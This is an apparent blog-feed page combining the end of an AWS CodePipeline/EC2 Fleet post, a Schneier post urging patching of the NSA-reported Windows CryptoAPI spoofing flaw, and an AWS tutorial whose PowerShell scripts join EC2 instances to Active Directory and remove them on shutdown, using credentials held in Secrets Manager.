Another variation of the previous strategies is to use Amazon EC2 Fleet to make use of cost-efficient spot instances for your build jobs.

Amazon EC2 Fleet makes it possible to combine on-demand instances with spot instances to deliver a cost-efficient solution for your build jobs. On-demand instances can provide the minimum required capacity, and spot instances provide a cost-efficient way to improve the performance of your build fleet.

Note that since spot instances could be terminated at any time, the Step Functions workflow has to support Amazon EC2 instance termination and restart the build on a different instance, transparently to CodePipeline.

Limits and Cost

The following are a few final thoughts.

Custom action timeouts

The default maximum execution time for CodePipeline custom actions is one hour. If your build jobs require more than an hour, you need to request a limit increase for custom actions.

Cost of running EC2 build instances

Custom Amazon EC2 instances could be even more cost-effective than CodeBuild for many scenarios. However, it is difficult to compare the total cost of ownership of a custom-built fleet with CodeBuild. CodeBuild is a fully managed build service, and you pay for each minute of using the service. In contrast, with Amazon EC2 instances you pay for the instance (either per hour or per second, depending on the instance type and operating system), plus EBS volumes, Lambda, and Step Functions. Use the AWS Simple Monthly Calculator to estimate the total cost of your projected build solution.

Cleanup

If you are running the above steps as part of a workshop or for testing, delete the resources to avoid incurring further charges. All resources are deployed as part of a CloudFormation stack, so open the CloudFormation console, select the specific stack, and choose Delete to remove it.

Conclusion

The CodePipeline custom action is a simple way to utilize Amazon EC2 instances for your build jobs and address a number of CodePipeline limitations.

The CodePipeline custom action with a simple Start/Terminate instance strategy is available on GitHub as an AWS CloudFormation template. You can import it into your account and start using the custom action in your pipelines right away.

An example of the pipeline that produces Windows Server containers and pushes them to Amazon ECR can also be found on GitHub.

I invite you to clone the repositories to play with the custom action, and to make any changes to the action definition, Lambda functions, or Step Functions flow.

Feel free to ask any questions or comments below, or file issues or PRs on GitHub to continue the discussion.

Critical Windows Vulnerability Discovered by NSA

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/01/critical_window.html

Yesterday’s Microsoft Windows patches included a fix for a critical vulnerability in the system’s crypto library.

A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.

An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.

A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

That’s really bad, and you should all patch your system right now, before you finish reading this blog post.

This is a zero-day vulnerability, meaning that it was not detected in the wild before the patch was released. It was discovered by security researchers. Interestingly, it was discovered by NSA security researchers, and the NSA security advisory gives a lot more information about it than the Microsoft advisory does.

Exploitation of the vulnerability allows attackers to defeat trusted network connections and deliver executable code while appearing as legitimately trusted entities. Examples where validation of trust may be impacted include:

  • HTTPS connections
  • Signed files and emails
  • Signed executable code launched as user-mode processes

The vulnerability places Windows endpoints at risk to a broad range of exploitation vectors. NSA assesses the vulnerability to be severe and that sophisticated cyber actors will understand the underlying flaw very quickly and, if exploited, would render the previously mentioned platforms as fundamentally vulnerable. The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners.

Early yesterday morning, NSA’s Cybersecurity Directorate head Anne Neuberger hosted a media call where she talked about the vulnerability and — to my shock — took questions from the attendees. According to her, the NSA discovered this vulnerability as part of its security research. (If it found it in some other nation’s cyberweapons stash — my personal favorite theory — she declined to say.) She did not answer when asked how long ago the NSA discovered the vulnerability. She said that this is not the first time the NSA sent Microsoft a vulnerability to fix, but it was the first time it has publicly taken credit for the discovery. The reason is that the NSA is trying to rebuild trust with the security community, and this disclosure is a result of its new initiative to share findings more quickly and more often.

Barring any other information, I would take the NSA at its word here. So, good for it.

And — seriously — patch your systems now: Windows 10 and Windows Server 2016/2019. Assume that this vulnerability has already been weaponized, probably by criminals and certainly by major governments. Even assume that the NSA is using this vulnerability — why wouldn’t it?

Ars Technica article. Wired article. CERT advisory.

EDITED TO ADD: Washington Post article.

EDITED TO ADD (1/16): The attack was demonstrated in less than 24 hours.

Brian Krebs blog post.

Managing domain membership of dynamic fleet of EC2 instances

Post Syndicated from whiteemm original https://aws.amazon.com/blogs/compute/managing-domain-membership-of-dynamic-fleet-of-ec2-instances/

This post is written by Alex Zarenin, Senior AWS Solution Architect, Microsoft Tech.

Updated: February 10, 2021

1.   Introduction

For most companies, a move of Microsoft workloads to AWS starts with “lift and shift,” where existing workloads are moved from on-premises data centers to the cloud. These workloads may include web and API farms and fleets of processing nodes, which typically depend on AD domain membership for access to shared resources, such as file shares and SQL Server databases.

When the farms and set of processing nodes are static, which is typical for on-premises deployments, managing domain membership is simple – new instances join the AD Domain and stay there. When some machines are periodically recycled, respective AD computer accounts are disabled or deleted, and new accounts are added when new machines are added to the domain. However, these changes are slow and can be easily managed.

When these workloads are moved to the cloud, it is natural to set up web and API farms as scalability groups, scaling membership up and down to optimize cost while meeting performance requirements. Similarly, processing nodes could be combined into scalability groups or created on demand as a set of Amazon EC2 Spot Instances.

In either case, the fleet becomes very dynamic, and can expand and shrink multiple times to match the load or in response to some events, which makes manual management of AD domain membership impractical. This scenario requires an automated solution for managing domain membership.

2.   Challenges

An automated solution to manage domain membership for a dynamic fleet of Amazon EC2 instances should provide for:

  • Seamless AD domain joining when new instances join the fleet, working for both managed and native ADs;
  • Automatic un-joining from the AD domain and removal of the respective computer account from AD when the instance is stopped or terminated;
  • Following best practices for protecting sensitive information, namely the identity of the account used to join the domain or remove a computer account from it;
  • Extensive logging to facilitate troubleshooting if something does not work as expected.

3.   Solution overview

Joining an AD domain, whether native or managed, can be achieved by placing a PowerShell script that performs the domain join into the User Data section of the EC2 instance launch configuration.

It is much more difficult to implement domain un-joining and deletion of the computer account from AD upon instance termination, as Windows does not support an On-Shutdown trigger in the Task Scheduler. However, it is possible to define an On-Shutdown script using the local Group Policy.

If defined, the On-Shutdown script runs on EVERY shutdown. However, joining a domain REQUIRES a reboot of the machine, so the On-Shutdown policy cannot be enabled on the first invocation of the User Data script; otherwise, the machine would be removed from the domain by the On-Shutdown script right after it joins the domain. Thus, the User Data script must have some logic to determine whether it is the first invocation upon instance launch or a subsequent one following the domain-join reboot. The On-Shutdown policy should be enabled only on the second start-up. This also makes it necessary to define the User Data script as “persistent” by specifying <persist>true</persist> in the User Data section of the launch configuration.
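For reference, a persistent User Data section has roughly the following shape; the script body is the one developed in the next sections.

<powershell>
# UserData script body goes here: initialize logging, set up the On-Shutdown
# policy, and join the domain (sections 4 and 5 of this post).
</powershell>
<persist>true</persist>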

Both the domain join and domain un-join scripts require a security context that allows them to perform these operations on the domain, which is usually achieved by providing credentials for a user account with the corresponding rights. In the proposed implementation, both scripts obtain account credentials from AWS Secrets Manager under the protection of security policies and roles; no credentials are stored in the scripts.

Both scripts generate a detailed log of their operation, stored in Amazon CloudWatch Logs.

In this post, I demonstrate a solution based on a PowerShell script that performs Active Directory domain joining on instance start-up through the EC2 launch User Data script. I also show removal from the domain, with deletion of the respective computer accounts, upon instance shutdown using the script installed by the On-Shutdown policy.

User Data script overall logic:

  1. Initialize Logging
  2. Initialize On-Shutdown Policy
  3. Read fields UserID, Password, and Domain from prod/AD secret
  4. Verify machine’s domain membership
  5. If machine is already a member of the domain, then
    1. Enable On-Shutdown Policy
    2. Install RSAT for AD PowerShell
  6. Otherwise
    1. Create credentials from the secret
    2. Initiate domain join
    3. Request machine restart

On-Shutdown script overall logic:

  1. Initialize Logging
  2. Check the cntrl variable; if it is not set to "run", exit the script
  3. Check whether the machine is a member of the domain; if not, exit the script
  4. Check whether RSAT for AD PowerShell is installed; if not, exit the script
  5. Read fields UserID, Password, and Domain from prod/AD secret
  6. Create credentials from the secret
  7. Identify domain controller
  8. Remove machine from the domain
  9. Delete the machine account from the domain controller (a sketch of steps 7-9 follows this list)
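A minimal sketch of steps 7-9, using the ActiveDirectory module and assuming $Secret and $credential have been populated as in steps 5 and 6, could look like the following. This is an illustration of the order of operations only, not the author’s exact script.

# Hedged sketch of steps 7-9: find a DC first, then un-join, then delete the account.
Import-Module ActiveDirectory

# 7. Identify a domain controller while the machine is still domain-joined.
$dc = (Get-ADDomainController -Discover -DomainName $Secret.Domain).HostName[0]

# 8. Remove the machine from the domain (switch it to a workgroup).
Remove-Computer -UnjoinDomainCredential $credential -WorkgroupName "WORKGROUP" -Force

# 9. Delete the computer account on the previously discovered domain controller.
Remove-ADComputer -Identity $env:COMPUTERNAME -Server $dc -Credential $credential -Confirm:$false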

Simplified Flow chart of User Data and On-Shutdown Scripts

Now that I have reviewed the overall logic of the scripts, I can examine the components of each script in more detail.

4.   Routines common to both UserData and On-Shutdown scripts

4.1. Processing configuration variables and parameters

The UserData script does not accept parameters and is executed exactly as provided in the UserData section of the launch configuration. However, at the beginning of the script a variable is defined that can be easily changed:

[string]$SecretAD  = "prod/AD"

This variable provides the name of the secret defined in the Secrets Manager that contains UserID, Password, and Domain.

The On-Shutdown Group Policy invokes the corresponding script with a parameter, which is stored in the registry as part of the policy setup. Thus, the first line of the On-Shutdown script defines the variable for this parameter:

param([string]$cntrl = "NotSet")

The next line of the On-Shutdown script provides the name of the secret, the same as in the User Data script. These values are generated from the corresponding variables in the User Data script.

4.2. The Logger class

Both scripts, UserData and On-Shutdown, use the same Logger class and log to the Amazon CloudWatch log group /ps/boot/configuration/. If this log group does not exist, the script attempts to create it. The name of the log group is stored in the Logger class variable $this.cwlGroup and can be changed if needed.

Each execution of either script creates a new log stream in the log group. The name of the log stream consists of three parts: the machine name, the script type, and a date-time stamp. The script type is passed to the Logger class in the constructor. Two script types are used: UserData for the script invoked through the UserData section, and UnJoin for the script invoked through the On-Shutdown policy. The log stream names may look like:

EC2AMAZ-714VBCO/UserData/2020-10-06_05.40.02

EC2AMAZ-714VBCO/UnJoin/2020-10-06_05.48.43
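A simplified sketch of such a Logger class is shown below. It buffers messages and writes them with a single call at the end, and it assumes the log group already exists, which is a simplification relative to the class described above.

# Hedged, simplified sketch of a Logger class for this log group/stream scheme.
Import-Module AWSPowerShell

class Logger {
    [string]$cwlGroup = "/ps/boot/configuration/"
    [string]$cwlStream
    [System.Collections.ArrayList]$events = @()

    Logger([string]$scriptType) {
        # Log stream name: <machine name>/<script type>/<date-time stamp>
        $this.cwlStream = "{0}/{1}/{2}" -f $env:COMPUTERNAME, $scriptType, (Get-Date -Format "yyyy-MM-dd_HH.mm.ss")
        New-CWLLogStream -LogGroupName $this.cwlGroup -LogStreamName $this.cwlStream
    }

    [void] WriteLine([string]$message) {
        $evt = New-Object Amazon.CloudWatchLogs.Model.InputLogEvent
        $evt.Message   = $message
        $evt.Timestamp = (Get-Date).ToUniversalTime()
        $this.events.Add($evt) | Out-Null
    }

    [void] Flush() {
        # Single PutLogEvents call with all buffered messages.
        Write-CWLLogEvent -LogGroupName $this.cwlGroup -LogStreamName $this.cwlStream -LogEvent $this.events
    }
}

$log = [Logger]::new("UserData")
$log.WriteLine("Logger initialized")
$log.Flush()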

5.   The UserData script

The following are the major components of the UserData script.

5.1. Initializing the On-Shutdown policy

The SDManager class wraps the functionality necessary to create the On-Shutdown policy. The policy requires certain registry entries and a script that executes when the policy is invoked. This script must be placed in a well-defined folder on the file system.

The SDManager constructor performs the following tasks:

  • Verifies that the folder C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown exists and, if necessary, creates it;
  • Updates the On-Shutdown script, stored as an array in SDManager, with the parameters provided to the constructor, and then saves the adjusted script in the proper location;
  • Creates all registry entries required for the On-Shutdown policy;
  • Sets the parameter that the policy passes to the On-Shutdown script to a value that precludes the On-Shutdown script from removing the machine from the domain.

SDManager exposes two member functions, EnableUnJoin() and DisableUnJoin(). These functions update the parameter passed to the On-Shutdown script to enable or disable removing the machine from the domain, respectively.
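Conceptually, these two functions are just registry writes. The sketch below illustrates the idea; the registry path and value name are placeholders, not necessarily the ones SDManager actually uses.

# Hedged sketch: the registry path and value name below are placeholders.
$policyParam = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\0"

function Enable-UnJoin  { Set-ItemProperty -Path $policyParam -Name "Parameters" -Value "run" }
function Disable-UnJoin { Set-ItemProperty -Path $policyParam -Name "Parameters" -Value "NotSet" }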

5.2. Reading the “secret”

Using the value of the configuration variable $SecretAD, the following code example retrieves the secret value from AWS Secrets Manager and creates a PowerShell credential to be used for the operations on the domain. The Domain value from the secret is also used to verify that the machine is a member of the required domain.

Import-Module AWSPowerShell

try { $SecretObj = (Get-SECSecretValue -SecretId $SecretAD) }
catch
    {
    $log.WriteLine("Could not load secret <" + $SecretAD + "> - terminating execution")
    return
    }

[PSCustomObject]$Secret = ($SecretObj.SecretString | ConvertFrom-Json)
$log.WriteLine("Domain (from Secret): <" + $Secret.Domain + ">")

To get the secret from AWS Secrets Manager, you must use an AWS-specific cmdlet. To make it available, you must import the AWSPowerShell module.

5.3. Checking for domain membership and enabling On-Shutdown policy

To check for domain membership, we use the WMI Win32_ComputerSystem class. While checking for domain membership, we also validate that, if the machine is a member of a domain, it is the domain specified in the secret.

If the machine is already a member of the correct domain, the script proceeds with installing RSAT for AD PowerShell, which is required by the On-Shutdown script, and enables the On-Shutdown policy. The following code example achieves this:

$compSys = Get-WmiObject -Class Win32_ComputerSystem
if ( ($compSys.PartOfDomain) -and ($compSys.Domain -eq $Secret.Domain))
    {
    $log.WriteLine("Already member of: <" + $compSys.Domain + "> - Verifying RSAT Status")
    $RSAT = (Get-WindowsFeature RSAT-AD-PowerShell)
    if ($RSAT -eq $null)
        {
        $log.WriteLine("<RSAT-AD-PowerShell> feature not found - terminating script")
        return
        }
    $log.WriteLine("Enable OnShutdown task to un-join Domain")
    $sdm.EnableUnJoin()
    if ( (-Not $RSAT.Installed) -and ($RSAT.InstallState -eq "Available") )
        {
        $log.WriteLine("Installing <RSAT-AD-PowerShell> feature")
        Install-WindowsFeature RSAT-AD-PowerShell
        }
    $log.WriteLine("Terminating script - ")
    return
    }

5.4. Joining Domain

If the machine is not a member of the domain, or is a member of the wrong domain, the script creates credentials from the secret and requests a domain join with a subsequent restart of the machine. The following code example performs these tasks:

$log.WriteLine("Domain Join required")

$log.WriteLine("Disable OnShutdown task to avoid reboot loop")

$sdm.DisableUnJoin()

$password   = $Secret.Password | ConvertTo-SecureString -asPlainText -Force

$username   = $Secret.UserID + "@" + $Secret.Domain

$credential = New-Object System.Management.Automation.PSCredential($username,$password)

$log.WriteLine("Attempting to join domain <" + $Secret.Domain + ">")

Add-Computer -DomainName $Secret.Domain -Credential $credential -Restart -Force

$log.WriteLine("Requesting restart...")

 

6.   The On-Shutdown script

Many components of the On-Shutdown script, such as logging, working with AWS Secrets Manager, and validating domain membership, are either the same as or very similar to the respective components of the UserData script.

One interesting difference is that the On-Shutdown script accepts a parameter from the policy. The value of this parameter is set by the EnableUnJoin() and DisableUnJoin() functions in the UserData script to control whether the domain un-join will happen on a particular reboot, as discussed earlier. Thus, the On-Shutdown script begins with the following code:

if ($cntrl -ne "run")
      {
      $log.WriteLine("Script param <" + $cntrl + "> not set to <run> - script terminated")
      return
      }

By setting the On-Shutdown policy parameter (a value in the registry) to something other than “run”, we can stop the On-Shutdown script from executing; this is exactly what the DisableUnJoin() function does. Similarly, the EnableUnJoin() function sets the value of this parameter to “run”, allowing the On-Shutdown script to continue execution when invoked.
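
As a minimal sketch of what these two functions do (the registry paths are the ones defined in the SDManager class in the full script at the end of this post), toggling the policy parameter looks roughly like this:

# DisableUnJoin(): prevent the On-Shutdown script from un-joining the domain
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\0" -Name "Parameters" -Value "ignore"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0\0" -Name "Parameters" -Value "ignore"
&gpupdate /Target:computer /Wait:0

# EnableUnJoin(): allow the On-Shutdown script to run and un-join the domain
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\0" -Name "Parameters" -Value "run"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0\0" -Name "Parameters" -Value "run"
&gpupdate /Target:computer /Wait:0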

Another interesting problem with this script is how to remove the machine from the domain and delete the respective computer account from Active Directory. If the script first removes the machine from the domain, it can no longer find a domain controller to delete the computer account.

Alternatively, if the script first deletes the computer account and then tries to remove the machine from the domain by switching it to a workgroup, that change would fail. The following code example shows how this issue was resolved in the script:

import-module ActiveDirectory
$DCHostName = (Get-ADDomainController -Discover).HostName
$log.WriteLine("Using Account <" + $username + ">")
$log.WriteLine("Using Domain Controller <" + $DCHostName + ">")
Remove-Computer -WorkgroupName "WORKGROUP" -UnjoinDomainCredential $credential -Force -Confirm:$false
Remove-ADComputer -Identity $MachineName -Credential $credential -Server "$DCHostName" -Confirm:$false

Before removing the machine from the domain, the script obtains the name of one of the domain controllers and stores it in a local variable. Then the computer is switched from the domain to a workgroup. As the last step, the respective computer account is deleted from AD using the host name of the domain controller obtained earlier.

7.   Managing Script Credentials

Both the UserData and On-Shutdown scripts obtain the domain name and the user credentials used to add or remove computers from the domain from an AWS Secrets Manager secret with the predefined name prod/AD. This predefined name can be changed in the script.

Details on how to create a secret are available in the AWS documentation. This secret should be defined as the Other type of secrets and contain at least the following fields:

  • UserID
  • Password
  • Domain

Fill in the respective fields on the Secrets Manager configuration screen and choose Next, as illustrated in the following screenshot:

Screenshot Store a new secret. UserID, Password, Domain

Give the new secret the name prod/AD (this name is referred to in the script) and capture the secret’s ARN. The latter is required for creating a policy that allows access to this secret.

Screenshot of Secret Details and Secret Name
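
If you prefer the command line to the console, a minimal sketch using the AWS Tools for PowerShell can create the same secret. The account values below are placeholders only and must be replaced with a real domain account that has rights to join and remove computers:

Import-Module AWSPowerShell

# Placeholder values - replace with your own domain join account
$secretBody = @{
    UserID   = "svc-domain-join"
    Password = "ExamplePasswordOnly"
    Domain   = "corp.example.com"
} | ConvertTo-Json

# Create the secret under the name the scripts expect and capture its ARN
$newSecret = New-SECSecret -Name "prod/AD" -SecretString $secretBody
$newSecret.ARN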

8.   Creating AWS Policy and Role to access the Credential Secret

8.1. Creating IAM Policy

The next step is to use IAM to create a policy that allows access to the secret; the policy statement will appear as follows:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "secretsmanager:GetSecretValue",
            "Resource": "arn:aws:secretsmanager:us-east-1:NNNNNNNN7225:secret:prod/AD-??????"
        }
    ]
}

Below is the AWS console screenshot with the policy statement filled in:

Screenshot with policy statement filled in

The resource in the policy is identified with “wildcard” characters in place of the 6 random characters at the end of the ARN, which may change when the secret is updated. Configuring the policy with the wildcard extends the rights to all versions of the secret, which allows the credential information to be changed without changing the respective policy.

Screenshot of review policy. Name AdminReadDomainCreds

Let’s name this policy AdminReadDomainCreds so that we can refer to it when creating an IAM role.
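
If you would rather script this step than use the console, a rough sketch with the AWS Tools for PowerShell could create the same policy; the policy document is the statement shown above, and the resulting ARN is the one you will attach to the role:

$policyDocument = @'
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "secretsmanager:GetSecretValue",
            "Resource": "arn:aws:secretsmanager:us-east-1:NNNNNNNN7225:secret:prod/AD-??????"
        }
    ]
}
'@

# Create the customer managed policy and keep its ARN for the role definition
$policy = New-IAMPolicy -PolicyName "AdminReadDomainCreds" -PolicyDocument $policyDocument
$policy.Arn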

 

8.2. Creating IAM Role

Now that the AdminReadDomainCreds policy is defined, you can create a role, AdminDomainJoiner, that refers to this policy. On the Permissions tab of the role creation dialog, attach the standard SSM policy for EC2, AmazonEC2RoleforSSM; the policy that allows the required CloudWatch logging operations, CloudWatchAgentAdminPolicy; and, finally, the custom policy AdminReadDomainCreds.

The Permissions tab of the role creation dialog with the respective policies attached is shown in the following screenshot:

Screenshot of permission tab with roles

This role should include our new policy, AdminReadDomainCreds, in addition to the standard SSM policy for EC2.
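
For a scripted alternative, a sketch of the equivalent role setup with the AWS Tools for PowerShell follows. The managed policy ARNs and the 123456789012 account ID are illustrative assumptions; substitute your own account ID or the ARN captured when you created AdminReadDomainCreds:

# Trust policy that lets EC2 instances assume the role
$trustPolicy = @'
{
  "Version": "2012-10-17",
  "Statement": [
    { "Effect": "Allow", "Principal": { "Service": "ec2.amazonaws.com" }, "Action": "sts:AssumeRole" }
  ]
}
'@

New-IAMRole -RoleName "AdminDomainJoiner" -AssumeRolePolicyDocument $trustPolicy

# Attach the managed policies and the custom secret-access policy
Register-IAMRolePolicy -RoleName "AdminDomainJoiner" -PolicyArn "arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM"
Register-IAMRolePolicy -RoleName "AdminDomainJoiner" -PolicyArn "arn:aws:iam::aws:policy/CloudWatchAgentAdminPolicy"
Register-IAMRolePolicy -RoleName "AdminDomainJoiner" -PolicyArn "arn:aws:iam::123456789012:policy/AdminReadDomainCreds"

# EC2 instances use the role through an instance profile of the same name
New-IAMInstanceProfile -InstanceProfileName "AdminDomainJoiner"
Add-IAMRoleToInstanceProfile -InstanceProfileName "AdminDomainJoiner" -RoleName "AdminDomainJoiner"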

9.   Launching the Instance

Now, you’re ready to launch the instance or create the launch configuration. When configuring the instance for launch, it’s important to assign the AdminDomainJoiner role, which you just created, to the instance:

Screenshot of Configure Instance Details. IAM role as AdminDomainJoiner

In the Advanced Details section of the configuration screen, paste the script into the User Data field:

If you named your secret differently from the prod/AD name that I used, modify the script parameter $SecretAD to use the name of your secret.
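
If you script the launch instead of using the console, a sketch with the AWS Tools for PowerShell might look like the following. The AMI ID, subnet ID, and file path are placeholders, and the parameter names reflect my understanding of the New-EC2Instance cmdlet, so verify them against the current module documentation:

# Read the UserData script (the <powershell>...</powershell> block at the end of this post)
$userData = Get-Content -Raw "C:\scripts\domain-join-userdata.txt"

New-EC2Instance -ImageId "ami-0123456789abcdef0" `
                -InstanceType "m5.large" `
                -SubnetId "subnet-0123456789abcdef0" `
                -InstanceProfile_Name "AdminDomainJoiner" `
                -UserData $userData `
                -EncodeUserData `
                -MinCount 1 -MaxCount 1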

10.   Conclusion

That’s it! When you launch this instance, it will automatically join the domain. Upon Stop or Termination, the instance will remove itself from the domain.

 

For your convenience we provide the full text of the UserData script:

 

<powershell>
# Script parameters
[string]$SecretAD = "prod/AD"
​
class Logger {
	#----------------------------------------------
	[string] hidden  $cwlGroup
	[string] hidden  $cwlStream
	[string] hidden  $sequenceToken
	#----------------------------------------------
	# Log Initialization
	#----------------------------------------------
	Logger([string] $Action) {
		$this.cwlGroup = "/ps/boot/configuration/"
		$this.cwlStream	= "{0}/{1}/{2}" -f $env:COMPUTERNAME, $Action,
		(Get-Date -UFormat "%Y-%m-%d_%H.%M.%S")
		$this.sequenceToken = ""
		#------------------------------------------
		if ( !(Get-CWLLogGroup -LogGroupNamePrefix $this.cwlGroup) ) {
			New-CWLLogGroup -LogGroupName $this.cwlGroup
			Write-CWLRetentionPolicy -LogGroupName $this.cwlGroup -RetentionInDays 3
		}
		if ( !(Get-CWLLogStream -LogGroupName $this.cwlGroup -LogStreamNamePrefix $this.cwlStream) ) {
			New-CWLLogStream -LogGroupName $this.cwlGroup -LogStreamName $this.cwlStream
		}
	}
	#----------------------------------------
	[void] WriteLine([string] $msg) {
		$logEntry = New-Object -TypeName "Amazon.CloudWatchLogs.Model.InputLogEvent"
		#-----------------------------------------------------------
		$logEntry.Message = $msg
		$logEntry.Timestamp = (Get-Date).ToUniversalTime()
		if ("" -eq $this.sequenceToken) {
			# First write into empty log...
			$this.sequenceToken = Write-CWLLogEvent -LogGroupName $this.cwlGroup `
				-LogStreamName $this.cwlStream `
				-LogEvent $logEntry
		}
		else {
			# Subsequent write into the log...
			$this.sequenceToken = Write-CWLLogEvent -LogGroupName $this.cwlGroup `
				-LogStreamName $this.cwlStream `
				-SequenceToken $this.sequenceToken `
				-LogEvent $logEntry
		}
	}
}
[Logger]$log = [Logger]::new("UserData")
$log.WriteLine("------------------------------")
$log.WriteLine("Log Started - V4.0")
$RunUser = $env:username
$log.WriteLine("PowerShell session user: $RunUser")
​
class SDManager {
	#-------------------------------------------------------------------
	[Logger] hidden $SDLog
	[string] hidden $GPScrShd_0_0 = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\0"
	[string] hidden $GPMScrShd_0_0 = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0\0"
	#-------------------------------------------------------------------
	SDManager([Logger]$Log, [string]$RegFilePath, [string]$SecretName) {
		$this.SDLog = $Log
		#----------------------------------------------------------------
		[string] $SecretLine = '[string]$SecretAD    = "' + $SecretName + '"'
		#--------------- Local Variables -------------
		[string] $GPRootPath = "C:\Windows\System32\GroupPolicy"
		[string] $GPMcnPath = "C:\Windows\System32\GroupPolicy\Machine"
		[string] $GPScrPath = "C:\Windows\System32\GroupPolicy\Machine\Scripts"
		[string] $GPSShdPath = "C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown"
		[string] $ScriptFile = [System.IO.Path]::Combine($GPSShdPath, "Shutdown-UnJoin.ps1")
		#region Shutdown script (scheduled through Local Policy)
		$ScriptBody =
		@(
			'param([string]$cntrl = "NotSet")',
			$SecretLine,
			'[string]$MachineName = $env:COMPUTERNAME',
			'class Logger {    ',
			'    #----------------------------------------------    ',
			'    [string] hidden  $cwlGroup    ',
			'    [string] hidden  $cwlStream    ',
			'    [string] hidden  $sequenceToken    ',
			'    #----------------------------------------------    ',
			'    # Log Initialization    ',
			'    #----------------------------------------------    ',
			'    Logger([string] $Action) {    ',
			'        $this.cwlGroup = "/ps/boot/configuration/"    ',
			'        $this.cwlStream = "{0}/{1}/{2}" -f $env:COMPUTERNAME, $Action,    ',
			'                                           (Get-Date -UFormat "%Y-%m-%d_%H.%M.%S")    ',
			'        $this.sequenceToken = ""    ',
			'        #------------------------------------------    ',
			'        if ( !(Get-CWLLogGroup -LogGroupNamePrefix $this.cwlGroup) ) {    ',
			'            New-CWLLogGroup -LogGroupName $this.cwlGroup    ',
			'            Write-CWLRetentionPolicy -LogGroupName $this.cwlGroup -RetentionInDays 3    ',
			'        }    ',
			'        if ( !(Get-CWLLogStream -LogGroupName $this.cwlGroup -LogStreamNamePrefix $this.cwlStream) ) {    ',
			'            New-CWLLogStream -LogGroupName $this.cwlGroup -LogStreamName $this.cwlStream    ',
			'        }    ',
			'    }    ',
			'    #----------------------------------------    ',
			'    [void] WriteLine([string] $msg) {    ',
			'        $logEntry = New-Object -TypeName "Amazon.CloudWatchLogs.Model.InputLogEvent"    ',
			'        #-----------------------------------------------------------    ',
			'        $logEntry.Message = $msg    ',
			'        $logEntry.Timestamp = (Get-Date).ToUniversalTime()    ',
			'        if ("" -eq $this.sequenceToken) {    ',
			'            # First write into empty log...    ',
			'            $this.sequenceToken = Write-CWLLogEvent -LogGroupName $this.cwlGroup `',
			'                -LogStreamName $this.cwlStream `',
			'                -LogEvent $logEntry    ',
			'        }    ',
			'        else {    ',
			'            # Subsequent write into the log...    ',
			'            $this.sequenceToken = Write-CWLLogEvent -LogGroupName $this.cwlGroup `',
			'                -LogStreamName $this.cwlStream `',
			'                -SequenceToken $this.sequenceToken `',
			'                -LogEvent $logEntry    ',
			'        }    ',
			'    }    ',
			'}    ',
			'[Logger]$log = [Logger]::new("UnJoin")',
			'$log.WriteLine("-----------------------------------------")',
			'$log.WriteLine("Log Started")',
			'if ($cntrl -ne "run") ',
			'    { ',
			'    $log.WriteLine("Script param <" + $cntrl + "> not set to <run> - script terminated") ',
			'    return',
			'    }',
			'$compSys = Get-WmiObject -Class Win32_ComputerSystem',
			'if ( -Not ($compSys.PartOfDomain))',
			'    {',
			'    $log.WriteLine("Not member of a domain - terminating script")',
			'    return',
			'    }',
			'$RSAT = (Get-WindowsFeature RSAT-AD-PowerShell)',
			'if ( $RSAT -eq $null -or (-Not $RSAT.Installed) )',
			'    {',
			'    $log.WriteLine("<RSAT-AD-PowerShell> feature not found - terminating script")',
			'    return',
			'    }',
			'$log.WriteLine("Removing machine <" +$MachineName + "> from Domain <" + $compSys.Domain + ">")',
			'$log.WriteLine("Reading Secret <" + $SecretAD + ">")',
			'Import-Module AWSPowerShell',
			'try { $SecretObj = (Get-SECSecretValue -SecretId $SecretAD) }',
			'catch ',
			'    { ',
			'    $log.WriteLine("Could not load secret <" + $SecretAD + "> - terminating execution")',
			'    return ',
			'    }',
			'[PSCustomObject]$Secret = ($SecretObj.SecretString  | ConvertFrom-Json)',
			'$password   = $Secret.Password | ConvertTo-SecureString -asPlainText -Force',
			'$username   = $Secret.UserID + "@" + $Secret.Domain',
			'$credential = New-Object System.Management.Automation.PSCredential($username,$password)',
			'import-module ActiveDirectory',
			'$DCHostName = (Get-ADDomainController -Discover).HostName',
			'$log.WriteLine("Using Account <" + $username + ">")',
			'$log.WriteLine("Using Domain Controller <" + $DCHostName + ">")',
			'Remove-Computer -WorkgroupName "WORKGROUP" -UnjoinDomainCredential $credential -Force -Confirm:$false ',
			'Remove-ADComputer -Identity $MachineName -Credential $credential -Server "$DCHostName" -Confirm:$false ',
			'$log.WriteLine("Machine <" +$MachineName + "> removed from Domain <" + $compSys.Domain + ">")'
		)
​
		$this.SDLog.WriteLine("Constracting artifacts required for domain UnJoin")
		#----------------------------------------------------------------
		try {
			if (!(Test-Path -Path $GPRootPath -pathType container))
			{ New-Item -ItemType directory -Path $GPRootPath }
			if (!(Test-Path -Path $GPMcnPath -pathType container))
			{ New-Item -ItemType directory -Path $GPMcnPath }
